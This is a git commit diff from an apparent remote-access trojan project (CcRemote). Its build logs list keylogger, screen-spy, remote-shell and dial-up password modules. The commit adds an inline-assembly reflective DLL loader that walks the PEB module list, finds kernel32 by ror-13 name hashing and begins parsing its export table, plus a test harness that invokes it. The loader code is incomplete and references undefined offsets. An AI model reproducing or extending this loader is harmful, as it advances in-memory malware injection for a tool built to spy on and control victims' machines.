PEB汇编

2025-06-13 15:59:52 +00:00 · 2020-09-21 20:40:40 +08:00 · 2020-09-21 20:40:40 +08:00 · d2afef0ac1
commit d2afef0ac1
parent d1c3b70e8f
12 changed files with 257 additions and 54 deletions
--- a/CcMainDll/.vs/CcMainDll/v15/.suo
+++ b/CcMainDll/.vs/CcMainDll/v15/.suo
--- a/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log
+++ b/CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log
@ -1,28 +1,28 @@
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
-f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\pch.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audio.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\until.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\buffer.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videocap.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\manager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\install.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\strcry.obj
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
+g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
--- a/CcMainDll/CcMainDll/Release/CcMainDll.log
+++ b/CcMainDll/CcMainDll/Release/CcMainDll.log
@ -8,14 +8,17 @@ g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4838: 从
 g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4309: “初始化”: 截断常量值
 g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVersionExA': 被声明为已否决
  g:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
-g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(50): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
  g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
-g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(224): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(229): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
  g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
+g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(252): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
+  g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
+g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(421): warning C4102: “loc_46327B”: 未引用的标签
 LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”；已忽略
    正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
  正在生成代码
-  1 of 375 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
+  1 of 380 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
    0 functions were new in current compilation
    0 functions had inline decision re-evaluated but remain unchanged
  已完成代码的生成
--- a/CcMainDll/CcMainDll/dllmain.cpp
+++ b/CcMainDll/CcMainDll/dllmain.cpp
@ -6,7 +6,12 @@
 #include "common/install.h"
 #include <stdio.h>
 #include <shlwapi.h>
+
 #pragma comment(lib,"shlwapi.lib")
+#include <iostream>
+#include <fstream>
+
+//using namespace std;


 struct Connect_Address
@ -231,6 +236,84 @@ extern "C" __declspec(dllexport) void TestFun(char* strHost, int nPort)



+FILE * pFile;
+
+long lSize;
+
+char * buffer;
+
+size_t result;
+extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
+{
+
+
+		// 一个不漏地读入整个文件，只能采用二进制方式打开
+
+		pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
+
+		if (pFile == NULL)
+
+		{
+
+			fputs("File error", stderr);
+
+			printf("open file fail");
+
+			return false;
+
+		}
+
+
+
+		// 获取文件大小 
+
+		fseek(pFile, 0, SEEK_END);
+
+		lSize = ftell(pFile);
+
+		rewind(pFile);
+
+
+
+		// 分配内存存储整个文件
+
+		buffer = (char*)malloc(sizeof(char)*lSize);
+
+		if (buffer == NULL)
+
+		{
+
+			fputs("Memory error", stderr);
+
+			printf("Memory alloc falil");
+
+			return false;
+
+		}
+
+
+
+		// 将文件拷贝到buffer中 
+
+		result = fread(buffer, 1, lSize, pFile);
+
+		if (result != lSize)
+
+		{
+
+			fputs("Reading error", stderr);
+
+			printf("Load file to memory falil");
+
+			return false;
+
+		}
+		return true;
+
+}
+
+
+
 inline DWORD GetCurrentPositionAddress()
 {
 	_asm{
@ -242,38 +325,60 @@ inline DWORD GetCurrentPositionAddress()
 	}
 }

+inline DWORD call_ror_0xD()
+{
+	_asm {
+		push    ebp
+		mov     ebp, esp
+		mov     eax, [ebp + 8]
+		ror		eax, 0x0D
+		pop     ebp
+		retn
+	}
+}
+
 enum LocalEnum
 {
 	Nop,
-	memAddress,
-	pLoadLibraryA,
-	pGetProcAddress,
-	pVirtualAlloc,
-	pVirtualProtect,
-	pNtFlushInstructionCache,
-	varLocalFindPE
+	memAddress					= 4,
+	pLoadLibraryA				= 8,
+	pGetProcAddress				= 0xC,
+	pVirtualAlloc				= 0x10,
+	pVirtualProtect				= 0x14,
+	pNtFlushInstructionCache	= 0x18,
+
+	varLocalFindPE				= 0x1c,
+	varLocalFS30_A				= 0x20,		// var_8
+	varLocalFS30_B				= 0x24,		// varLocalFS30_B
+	var_4						= 0x28,		// FullDllName
+	BaseDllName					= 0x2c,		// FullDllName
+	name_hash					= 0x30,
+	var_20						= 0x34

 };

+
+
 extern "C" __declspec(dllexport) void ReflectiveLoader()
 {
 	_asm{
 		push    ebp
 		mov     ebp, esp
-		sub     esp, 0x100
+		sub     esp, 0x100					// 抬高堆栈创建局部变量空间
 		mov     eax, 4
-		initLocalVar:
+		initLocalVar:						// 循环initLocalVar初始化局部变量空间为0
 		mov		[ebp + eax], 0
 		inc		eax
 		cmp		eax ,0x100
 		jnz		initLocalVar

-		call    GetCurrentPositionAddress	//获取当前位置地址
-		mov		[ebp + memAddress], eax		//保存当前代码所在的地址 memAddress
+		call    GetCurrentPositionAddress	// 获取当前位置地址
+		mov		eax, buffer
+		mov		[ebp + memAddress], eax		// 保存当前代码所在的地址 memAddress
 		
 		addressAdd :
 		mov     eax, 1
-		test    eax, eax					//判断eax是否获取到当前地址
+		test    eax, eax					// 判断eax是否获取到当前地址
 		jz      find_success
 			
 		mov     ecx, [ebp + memAddress]		// 查找DOS头
@ -285,27 +390,112 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
        mov     eax, [ebp + memAddress]
        mov     ecx, [eax + 0x3C]			// +3C 找到DOS Header e_lfanew
        mov		[ebp + varLocalFindPE], ecx
-        cmp		[ebp + varLocalFindPE], 0x40
+        cmp		dword ptr[ebp + varLocalFindPE], 0x40
        jb      noFindFlag					// 地址address - 1
-        cmp		[ebp + varLocalFindPE], 0x400
-        jnb     noFindFlag					//; 地址address - 1
+        cmp		dword ptr[ebp + varLocalFindPE], 0x400
+        jnb     noFindFlag					// 地址address - 1

        mov     edx, [ebp + varLocalFindPE]
        add     edx, [ebp + memAddress]
        mov		[ebp + varLocalFindPE], edx
        mov     eax, [ebp + varLocalFindPE]
-        cmp     dword ptr[eax], 0x4550		//; 判断PE Header Signature PE标志
-        jnz     noFindFlag			//; 地址address - 1
+        cmp     dword ptr[eax], 0x4550		// 判断PE Header Signature PE标志
+        jnz     noFindFlag					// 地址address - 1
+		jmp     find_success				// 找到了singtrue 跳转

-		noFindFlag :
+			noFindFlag :
 		mov     ecx, [ebp + memAddress]; 地址address - 1
 		sub     ecx, 1
 		mov		[ebp + memAddress], ecx
 		jmp		addressAdd

+			find_success:
+		mov     edx, fs:[0x30]				// 获取PEB结构地址
+		mov		[ebp + varLocalFS30_A], edx
+		mov     eax, [ebp + varLocalFS30_A]
+		mov     ecx, [eax + 0x0C]			// 获取Ptr32 _PEB_LDR_DATA 进程加载模块链表(Ldr)
+		mov		[ebp + varLocalFS30_A], ecx
+		mov     edx, [ebp + varLocalFS30_A]
+		mov     eax, [edx + 0x14]			// 获取结构中InMemoryOrderModuleList 顺序模块列表
+		mov		[ebp + varLocalFS30_B], eax
+
+			loc_46327B: 
+		cmp		[ebp + varLocalFS30_B], 0
+		jz      find_moudle_null
+		mov     ecx, [ebp + varLocalFS30_B]
+		mov     edx, [ecx + 0x28]			// FullDllName_buff 模块名称
+		mov		[ebp + BaseDllName], edx
+		mov     eax, [ebp + varLocalFS30_B]
+		mov     cx, [eax + 0x24]			// UNICODE_STRING FullDllName Length
+		mov		[ebp + var_4], cx			// var_4保存FullDllName字符串长度
+		mov		[ebp + name_hash], 0
+
+			calc_hash:
+		mov     edx, [ebp + name_hash]
+		push    edx
+		call    call_ror_0xD
+		add     esp, 4
+		mov		[ebp + name_hash], eax		// ror后的eax为返回值
+		mov     eax, [ebp + BaseDllName]
+		movzx   ecx, byte ptr[eax]
+		cmp     ecx, 0x61					// 判断获取到的模块字符串的指定位置，小于跳转，地址 + 1，比对下一个字母
+		jl      less_flage
+		mov     edx, [ebp + BaseDllName]	// 获取名称byte
+		movzx   eax, byte ptr[edx]			// eax = byte
+		mov     ecx, [ebp + name_hash]		// 计算值
+		lea     edx, [ecx + eax - 0x20]		// hash + FullDllName[index] - 0x20
+		mov		[ebp + name_hash], edx		// 得到结果
+		jmp     calc_end
+
+			less_flage:
+		add     ecx, [ebp + name_hash]
+		mov[ebp + name_hash], ecx
+
+			calc_end:
+		mov     edx, [ebp + BaseDllName]	// 名称地址 + 1
+		add     edx, 1
+		mov		[ebp + BaseDllName], edx
+		mov     ax, [ebp + var_4]			// 字符串名称长度 - 1
+		sub     ax, 1
+		mov		[ebp + var_4], ax
+		movzx   ecx, [ebp + var_4]
+		test    ecx, ecx					// 判断长度是否为0，没有为0继续计算hash
+		jnz     calc_hash					// 计算简单的模块名称name_hash
+			
+		cmp		[ebp + name_hash], 0x6A4ABC5B	// 6A4ABC5B = Kernel32
+		jnz     no_Kernel32_hash				// 3CFA685D = ntdll
+		mov     edx, [ebp + varLocalFS30_B]		// 获取结构中InMemoryOrderModuleList
+		mov     eax, [edx + 0x10]
+		mov		[ebp + varLocalFS30_A], eax		// +10偏移获取DllBase基址
+		mov     ecx, [ebp + varLocalFS30_A]
+		mov     edx, [ebp + varLocalFS30_A]
+		add     edx, [ecx + 0x3C]				// 获取PE IMAGE_DOS_HRADER e_lfanew
+		mov		[ebp + var_20], edx				
+		mov     eax, 8
+		imul    ecx, eax, 0						// imul 1, 2, 3	  2 3乘积保存到1
+		mov     edx, [ebp + var_20]
+		lea     eax, [edx + ecx + 0x78]			// 获取IMAGE_OPTIONAL_HEADER -> IMAGE_DATA_DIRECTORY[0] EXPORT 导出表
+		mov		[ebp + exp_AddressOfNames], eax
+		mov     ecx, [ebp + exp_AddressOfNames]
+		mov     edx, [ebp + varLocalFS30_A]		// edx = 基地址
+		add     edx, [ecx]						// 基地址 + 导出表地址
+		mov		[ebp + var_20], edx
+		mov     eax, [ebp + var_20]
+		mov     ecx, [ebp + varLocalFS30_A]
+		add     ecx, [eax + 0x20]				// 获取 IMAGE_EXPORT_DIRECTORY +0x20 AddressOfNames
+		mov		[ebp + exp_AddressOfNames], ecx
+		mov     edx, [ebp + var_20]
+		mov     eax, [ebp + varLocalFS30_A]
+		add     eax, [edx + 0x24]				// 获取 IMAGE_EXPORT_DIRECTORY +0x24 AddressOfNameOrdinals
+		mov		[ebp + AddressOfNameOrdinals], eax
+		mov     ecx, 4
+		mov		[ebp + var_4], cx


-		find_success:
+
+
+			find_moudle_null:
+

 	}

--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.Build.CppClean.log
@ -1 +1 @@
-f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
+g:\ccremote\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.log
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.log
@ -1,6 +1,6 @@
-C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。  此生成实例将添加斜杠，因为必须有这个斜杠才能正确计算 Output 目录。
+G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。  此生成实例将添加斜杠，因为必须有这个斜杠才能正确计算 Output 目录。
  TestLoadDll.cpp
  正在生成代码
  All 171 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
  已完成代码的生成
-  TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
+  TestLoadDll.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
--- a/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate
+++ b/CcMainDll/TestLoadDll/Release/TestLoadDll.tlog/TestLoadDll.lastbuildstate
@ -1,2 +1,2 @@
 #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
-Release|Win32|F:\myapp\CcRemote\CcMainDll\|
+Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|
--- a/CcMainDll/TestLoadDll/TestLoadDll.cpp
+++ b/CcMainDll/TestLoadDll/TestLoadDll.cpp
@ -11,6 +11,16 @@ int main()
 	//载入服务端dll hijack test
 	HMODULE hServerDll = LoadLibrary(".\\..\\..\\bin\\server\\CcMainDll.dll");

+	typedef int(_cdecl *TestRunInit)();
+
+	TestRunInit InitTestReflectiveLoader = (TestRunInit)GetProcAddress(hServerDll, "InitTestReflectiveLoader");
+
+	if (InitTestReflectiveLoader != NULL)
+	{
+		InitTestReflectiveLoader();   //调用这个函数
+	}
+
+
 	//声明导出函数类型--导出的TestRun函数
 	typedef void(_cdecl *TestRunT)();
 	//寻找dll中导出函数
--- a/CcRemote/.vs/CcRemote/v15/.suo
+++ b/CcRemote/.vs/CcRemote/v15/.suo
--- a/bin/server/CcMainDll.dll
+++ b/bin/server/CcMainDll.dll
--- a/bin/server/CcMainDll.lib
+++ b/bin/server/CcMainDll.lib
--- a/bin/server/TestLoadDll.exe
+++ b/bin/server/TestLoadDll.exe